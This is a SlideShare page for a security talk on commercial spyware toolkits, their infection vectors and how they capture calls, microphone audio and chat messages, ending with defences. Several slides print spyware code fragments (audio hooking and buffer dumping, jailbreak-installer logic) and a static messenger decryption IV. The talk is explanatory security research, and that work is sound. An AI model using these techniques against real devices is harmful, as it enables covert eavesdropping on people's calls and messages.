SlideShare a Scribd company logo

A Stealthy Stealers - Spyware Toolkit and What They Do

sanghwan ahn
sanghwan ahn

A Stealthy Stealers - Spyware Toolkit and What They Do I. Stealthy Stealers
 II. Infection Vectors
 III. Capture Sensitive Data
 IV. Conclusion


Technology
1 of 42
Download to read offline
A Stealthy Information Stealers They know the things that we can’t help with Documented by Ahn Sanghwan(h2spice@gmail.com)
2 AgendaAgenda I. Stealthy Stealers
 II. Infection Vectors
 III. Capture Sensitive Data
 IV. Conclusion

Stealthy Stealer 3 They want to look through our eyes.
Stealthy Stealer 4 The Web is moving to HTTPS. Encryption is increasingly more common. They want to look through our eyes.
Stealthy Stealer 5 They are looking for a Solution They want to look through our eyes.
Stealthy Stealer 6 They Hack the target, overcome encryption and capture relevant data They want to look through our eyes.
7 https://youtu.be/TOXRHK_1kVg?t=30s
Stealthy Stealer 8 FinSpy There are many commercial spyware toolkits for Intelligence Agency
9 Stealthy Stealer Many Country bought spyware toolkits
10 Stealthy Stealer • FinFisher(FinSpy) Customers : 32
 Canada, Mexico, Panama, United States, Australia, Bangladesh, Brunei, India, Indonesia, Japan, Malaysia, Mongolia, Pakistan, Turkmenistan, Vietnam, Singapore, Ethiopia, Nigeria, South Africa, Austria, Bulgaria, Latvia, Lithuania, Macedonia, Netherlands, Romania, Serbia, United Kingdom, Bahrain, Turkey, Qatar, United Arab Emirates • Hacking Team(Da vinci, Galileo) : 36
 Brasil, Lebanon, Bahrein, Poland, Colombia, Azerbaijan, Honduras, Cyprus, Turkey, Nigeria, Russia, Thailand, Switzerland, South Korea ,Oman, Ecuador, Spain, Vietnam, Mongolia, Czech Rep, Luxemburg, Egypt, Ethiopia, Panama, Uzbekistan, Singapore, Sudan, Kazakistan, United States, United Arab Emirates, Malaysia, Hungary, Chile, Saudi, Morocco, Italy, Mexico There are many commercial spyware toolkits for Intelligence Agency
Stealthy Stealer There are many commercial spyware toolkits for Public
Stealthy Stealer 12 They make almost all platforms on target
Stealthy Stealer 13 Collect Everything, Constantly.
14 Infection Vectors Local Local Remote
15 In Local • Bootable CD/DVD/USB • Bad-USB • Customized Jail-Breaking or Rooting Tools for mobile devices Infection Vectors https://youtu.be/oNsXKPHBR3s?t=4m32s
16 with Bootable CD/DVD/USB or BAD-USB Infection Vectors https://youtu.be/oNsXKPHBR3s?t=6m8s
17 with Customised Jail-breaking(or Rooting Tools) for mobile devices Infection Vectors
18 with Customised Jail-breaking or Rooting Tools for mobile devices Infection Vectors if ( !sub_100020990(v4, off_102502328) ) afc_make_directory((__int64)v4, off_102502328); v1 = sub_100021000(off_102502328, "Cydia.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 128LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 136LL)) ) { free(v1); usleep(0x7A120u); v1 = sub_100021000(off_102502328, "pangu.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 144LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 152LL)) ) { free(v1); usleep(0x7A120u); v1 = sub_100021000(off_102502328, "pangu_ex.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 160LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 168LL)) ) { free(v1); usleep(0x7A120u); v1 = sub_100021000(off_102502328, "packagelist.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 192LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 200LL)) ) { free(v1); usleep(0x7A120u); v2 = 1; v1 = 0LL; if ( *(_BYTE *)(*(_QWORD *)(a1 + 8) + 1264LL) ) { v1 = sub_100021000(off_102502328, "helper.tar");
19 Mactans (BlackHat 2013) Infection Vectors • Injecting Malware into iOS Devices via Malicious Charger • Yeongjin Jang, Billy Lau, Chengyu Song, Georgia Institute of Technology
20 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
21 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
22 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
23 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
24 In Remote - Network Injection Infection Vectors https://youtu.be/BXTyxAsYk3w?t=12s
Capture Sensitive Data 25 Sensitive Data that stealer can capture. Money Call Message Password Contacts Location MIC E-Mail Camera KeyLog Clipboard Web HistoryFile Screenshot
Capture Sensitive Data 26 Android Call & MIC • Audio Unit Hooking by Dynamic Binary Instrumentation(DBI)
 HOOK
27 void* setStreamVolume_h(void* a, void* b, void* c, void* d, voi void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* newTrack_h(void* a, void* b, void* c, void* d, void* e, voi void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* startTrack_h(void* a, void* b, void* c, void* d, void* e, void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* stopTrack_h(void* a, void* b, void* c, void* d, void* e, vo void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* threadLoop_h(void* a, void* b, void* c, void* d, void* e, void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* audioFlingerC1_h(void* a, void* b, void* c, void* d, void void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* audioFlingerC2_h(void* a, void* b, void* c, void* d, void void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* getBuffer_h(void* a, void* b, void* c, void* d, void* e, vo void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* stepUser_h(void* a, void* b, void* c, void* d, void* e, voi void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* stepServer_h(void* a, void* b, void* c, void* d, void* e, void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* recordTrack_getNextBuffer_h(void* a, void* b, void* c, void* n, void* o, void* p, void* q, void* r, void* s, void* t, void* void* recordTrack_getNextBuffer2_h(void* a, void* b, void* c m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo void* playbackTrack_getNextBuffer_h(void* a, void* b, void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo void* playbackTrack_getNextBuffer2_h(void* a, void* b, void* void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* void* playbackTrack_getNextBuffer3_h(void* a, void* b, void* void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* void* recordThread_getNextBuffer_h(void* a, void* b, void* c m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo void* playbackTimedTrack_getNextBuffer_h(void* a, void* b, void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* void* newRecordTrack_h(void* a, void* b, void* c, void* d, void void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* recordTrackStart_h(void* a, void* b, void* c, void* d, vo void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* playbackTrackStart_h(void* a, void* b, void* c, void* d, void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* recordTrackStop_h(void* a, void* b, void* c, void* d, voi
28 record2 if( cblk_tmp == NULL ) { #ifdef DBG log("uthash shit happenedn"); #endif return result; } #ifdef DBG log("ttadded cblk from within getNextBuffern"); #endif } // otherwise dump from cblkb_tmp: buffer->raw [1] to buffer->frameCount [2] * frameSize [3] // and update cblk_tmp else { if( result == 0 && cblk_tmp->lastFrameCount != 0 ) { // aka NO_ERROR and cblk_tmp-last* contains valid pointers (see goto getNextBuffer_exit) // header headerStart = lseek(fd_in, 0, SEEK_CUR); #ifdef DBG log("ttheaderStart: %xn", headerStart); #endif uintTmp = 0xdeaddead; write(fd_in, &uintTmp, 4); // 1] cblk write(fd_in, &uintTmp, 4); // 2] timestamp write(fd_in, &uintTmp, 4); // 3] timestamp write(fd_in, &uintTmp, 4); // 4] streamType write(fd_in, &uintTmp, 4); // 5] sampleRate write(fd_in, &uintTmp, 4); // 6] size of block #ifdef DBG log("tttbuffer spans: %p -> %pn", cblk_tmp->lastBufferRaw, (cblk_tmp->lastBufferRaw + cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize ) ); #endif res = write(fd_in, cblk_tmp->lastBufferRaw, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize); #ifdef DBG log("ttttwrote: %d - expected: %dn", res, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize ); #endif positionTmp = lseek(fd_in, 0, SEEK_CUR); #ifdef DBG log("ttfake header written: %xn", positionTmp); #endif // Dumping Audio Buffer
Capture Sensitive Data 29 iOS Call & MIC • Audio Unit Hooking by Substrate
Capture Sensitive Data 30 iOS Call & Voice • Audio Unit Hooking by Substrate micBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples; micBuffer.mBuffers[0].mData = malloc(micBuffer.mBuffers[0].mDataByteSize); AudioBufferList speakerBuffer; speakerBuffer.mNumberBuffers = 1; speakerBuffer.mBuffers[0].mNumberChannels = 1; speakerBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples; speakerBuffer.mBuffers[0].mData = malloc(speakerBuffer.mBuffers[0].mDataByteSize); AudioBufferList mixBuffer; mixBuffer.mNumberBuffers = 1; mixBuffer.mBuffers[0].mNumberChannels = 2; mixBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples * 2; mixBuffer.mBuffers[0].mData = malloc(mixBuffer.mBuffers[0].mDataByteSize); //Converting while (true) { //Reading data from input files UInt32 framesToRead = bufferSizeInSamples; ExtAudioFileRead(micFile, &framesToRead, &micBuffer); ExtAudioFileRead(speakerFile, &framesToRead, &speakerBuffer); if (framesToRead == 0) { break; } //Building interleaved stereo buffer - left channel is mic, right - speaker for (int i = 0; i < framesToRead; i++) { memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2, (char*)micBuffer.mBuffers[0].mData + i * sampleSize, sampleSize); memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2 + sampleSize, (char*)speakerBuffer.mBuffers[0].mData + i * sampleSize, sampleSize); } //Writing to output file - LPCM will be converted to AAC ExtAudioFileWrite(mixFile, framesToRead, &mixBuffer); } //Closing files // Dumping Audio Buffer
Capture Sensitive Data 31 Capture Message & Another data • Stored message as file (.db .sqlite .xml or etc) • Plain-Text • Encrypted Message • need a Decryption (usually, Key stored in the local storage)
Capture Sensitive Data 32 Encrypted Message - case of Kakao Talk • AES 256 CBC Encryption • Generate a Encryption-Key base on UserId • IVKey is static (1608096f02172b0821210a1003030706)

Capture Sensitive Data 33 Deleted Message Recovery • Before Deleting • After Deleting
Capture Sensitive Data 34 Capture Message via Window • Accessibility • Special Permission for Accessibility 

Capture Sensitive Data 35 • Accessibility • Special Permission for Accessibility 
 Capture Message via Window
Capture Sensitive Data 36 Messages or another datas • Stored message as file (.db .sqlite .xml or etc) • plain-text • encrypted message • need a decryption (usually, encryption-key store in the local storage) • special permission , accessibility • SMS, BLIND
37
38
Capture Sensitive Data 39 Authentication Bruteforce Attack • Using information collected from another website hacked
Conclusion 40 We still confront security holes that we hardly control or even can not • Injection issue on the Network Level : File Reputation Services : VPN
 • Encrypt issue : Trusted Platform Module - Encrypt/Decrypt sensitive data using the secure world • Authentication Bruteforce Attack : 2 Channel Authentication
Q / A
Thanks

Recommended

System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Huntingsanghwan ahn
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPsanghwan ahn
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...sanghwan ahn
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-driversyushiang fu
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
 

Recommended

System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Huntingsanghwan ahn
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPsanghwan ahn
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...sanghwan ahn
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-driversyushiang fu
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?Alexandre Moneger
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friendsnuc13us
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world! Hacks in Taiwan (HITCON)
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychainAlexey Troshichev
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
20110114 Next Generation Sequencing Course
20110114 Next Generation Sequencing Course20110114 Next Generation Sequencing Course
20110114 Next Generation Sequencing CoursePierre Lindenbaum
 
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...Security Session
 
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...sanghwan ahn
 
Design and Implementation of GCC Register Allocation
Design and Implementation of GCC Register AllocationDesign and Implementation of GCC Register Allocation
Design and Implementation of GCC Register AllocationKito Cheng
 

More Related Content

What's hot

Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?Alexandre Moneger
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friendsnuc13us
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
20110114 Next Generation Sequencing Course
20110114 Next Generation Sequencing Course20110114 Next Generation Sequencing Course
20110114 Next Generation Sequencing CoursePierre Lindenbaum
 
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...Security Session
 

What's hot (20)

Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an Exploit
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friends
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychain
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)
 
20110114 Next Generation Sequencing Course
20110114 Next Generation Sequencing Course20110114 Next Generation Sequencing Course
20110114 Next Generation Sequencing Course
 
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...
Robots against robots: How a Machine Learning IDS detected a novel Linux Botn...
 

Viewers also liked

System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...sanghwan ahn
 
Design and Implementation of GCC Register Allocation
Design and Implementation of GCC Register AllocationDesign and Implementation of GCC Register Allocation
Design and Implementation of GCC Register AllocationKito Cheng
 
How to find_vulnerability_in_software
How to find_vulnerability_in_softwareHow to find_vulnerability_in_software
How to find_vulnerability_in_softwaresanghwan ahn
 
References Are 'Nice' Pointers
References Are 'Nice' PointersReferences Are 'Nice' Pointers
References Are 'Nice' PointersGail Carmichael
 
Light talk @ coscup 2011 : Incremental Global Prelink for Android
Light talk @ coscup 2011 : Incremental Global Prelink for AndroidLight talk @ coscup 2011 : Incremental Global Prelink for Android
Light talk @ coscup 2011 : Incremental Global Prelink for AndroidKito Cheng
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explainedTeja Babu
 
Rethinking the debugger
Rethinking the debuggerRethinking the debugger
Rethinking the debuggerIulian Dragos
 
Exception handling poirting in gcc
Exception handling poirting in gccException handling poirting in gcc
Exception handling poirting in gccShiva Chen
 
Programmazione Genetica per l'Inferenza di Reti di Kauffman
Programmazione Genetica per l'Inferenza di Reti di KauffmanProgrammazione Genetica per l'Inferenza di Reti di Kauffman
Programmazione Genetica per l'Inferenza di Reti di KauffmanDaniele Bellavista
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowVi Tính Hoàng Nam
 
ARM procedure calling conventions and recursion
ARM procedure calling conventions and recursionARM procedure calling conventions and recursion
ARM procedure calling conventions and recursionStephan Cadene
 
Android C Library: Bionic 成長計畫
Android C Library: Bionic 成長計畫Android C Library: Bionic 成長計畫
Android C Library: Bionic 成長計畫Kito Cheng
 

Viewers also liked (20)

System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
 
Design and Implementation of GCC Register Allocation
Design and Implementation of GCC Register AllocationDesign and Implementation of GCC Register Allocation
Design and Implementation of GCC Register Allocation
 
How to find_vulnerability_in_software
How to find_vulnerability_in_softwareHow to find_vulnerability_in_software
How to find_vulnerability_in_software
 
Algorithms
AlgorithmsAlgorithms
Algorithms
 
References Are 'Nice' Pointers
References Are 'Nice' PointersReferences Are 'Nice' Pointers
References Are 'Nice' Pointers
 
Light talk @ coscup 2011 : Incremental Global Prelink for Android
